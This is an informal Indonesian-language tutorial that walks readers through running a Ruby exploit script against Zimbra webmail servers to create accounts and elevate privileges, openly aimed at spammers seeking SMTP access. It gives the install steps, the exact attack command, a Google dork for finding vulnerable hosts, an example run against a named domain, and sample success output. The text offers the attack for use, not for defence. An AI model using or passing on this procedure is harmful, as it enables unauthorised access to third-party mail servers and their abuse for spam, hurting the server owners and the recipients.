Tutorial Exploit SMTP Zimbra

Asallamualaikum gan .. :D
Berhubung ane lagi pengen ngetik , ane pengen berbagi ilmu nih ..
ilmu ini ilmu buat cari smtp gan .. cocok buat para spammer yang lagi butuh SMTP :D

Oke langsung ajh ...

Wajib Download Bahannya gan :

•      Aplikasi ruby + Db

Langkah Installasi

• Instal ruby samapai selesai di program files c:\
• jangan lupa extrak file 30085.zip nya di ruby - bin; extrak di situ

cara memperintahkan di cmd

• Buka cmd
• Jalan kan perintah nya  
• "cd c:\ruby\bin" *tanpakutip
• ruby run.rb -t http://www.target.com -u "  usernamemu" -p "passwordmu" 

Cara Mencari Target menggunakan dork google

Untuk mencari target butuh dork zimbra, ane hanya ngasih 1 dork

inurl:"web client zimbra login"
Untuk dork lain silahkan mencari dan mengembangkan dork sendiri 

Langkah mencari target :

• Buka google.com
• Masukkan dork diatas tadi kedalam google
• Contoh : http://tangguh.co.id/questions/linux-server-73/customize-zimbra-web-client-login-screen-in-v8-4175450789/
  ambil website domainnya saja, http://tangguh.co.id
• Copy dan Paste di cmd yang tadi sudah diberi perintah,
  ruby run.rb -t mail.tangguh.co.id -u paypalsecure -p aa11AA11
• Kemudian liat hasilnya

contoh gambar sukses :

Jika sukses ada notice sepeti ini di cmd

[*]Looking if host is vuln....
[+] Host is vuln exploiting...
[+] Obtaining Domain Name
[+] Creating Account
[+] Elevating Privileges


Untuk lebih jelasnya saksikan video ane ajh gan nih ...
 

Jika masih belum jelas silahkan Chat ajh fb ane gan ..
iNcuNaSpiderMan

Sekian dulu Gann ..
Wasalamualaikum gann :)